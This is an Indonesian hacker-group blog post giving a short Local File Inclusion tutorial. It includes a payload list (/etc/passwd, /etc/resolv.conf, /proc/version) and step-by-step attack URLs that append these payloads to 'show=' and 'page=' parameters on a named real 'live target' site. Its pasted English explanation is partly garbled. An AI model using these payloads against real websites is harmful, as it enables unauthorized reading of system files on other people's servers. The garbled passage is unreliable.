Assalamualaikum
Balik lagi ma gua Noub93 Gans:v, Mengtutor Local File Inclusion (LFI) #1
Local File inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application into including files on the web server by exploiting a functionality that dynamically includes local files or scripts. The consequences of a successful LFI attack include Directory Traversal and Information Disclosure as well as Remote Code Execution.
Typically, Local File Inclusion (LFI) occurs, when an application gets the path to the file that has to be included as an input without treating it as untrusted input. This would allow a local file to be supplied to the included statemen
Local File Inclusion is very much like Remote File Inclusion (RFI), with the difference that with Local File Inclusion, an attacker can only include local files (not remote files like in the case of RFI).t.FI).
LANJUT AE KE TUTOR:V
Bahan"
->Exploit :
- /etc/passwd
- /etc/resolv.conf
- /proc/version
- /etc/resolv.
- /proc/version
->Live Target : https://lab.fotoforensics.com/faq.php?
Maka tampilan seperti ini
Itu tampilan awal belom di apa"in:v
Lanjut....
Sebelum lu kasih Exploit,lu kasih page / show dulu
Contoh : https://lab.fotoforensics.com/faq.php?show=
https://lab.fotoforensics.com/faq.php?page=
Nah seperti itu
Oke lanjut,sekarang lu tambahin aja Exploit nya bebas...
Contoh : /etc/passwd
Contoh gua pake yang show=
Jadi https://lab.fotoforensics.com/faq.php?show=/etc/passwd
Maka hasilnya akan menjadi seperti ini
Nah seperti itu, selesai dech,tamat:v
Sekian dan jika ada kesalahan moon maaf
Gua manusia biasa jadi suka khilaf:v
Wassalamu'alaikum
ThanksTo : Dark_193N,Badboy,Akhsan,Killermoon And -> All Member NCT
#Nexus Cyber Team
Tidak ada komentar:
Posting Komentar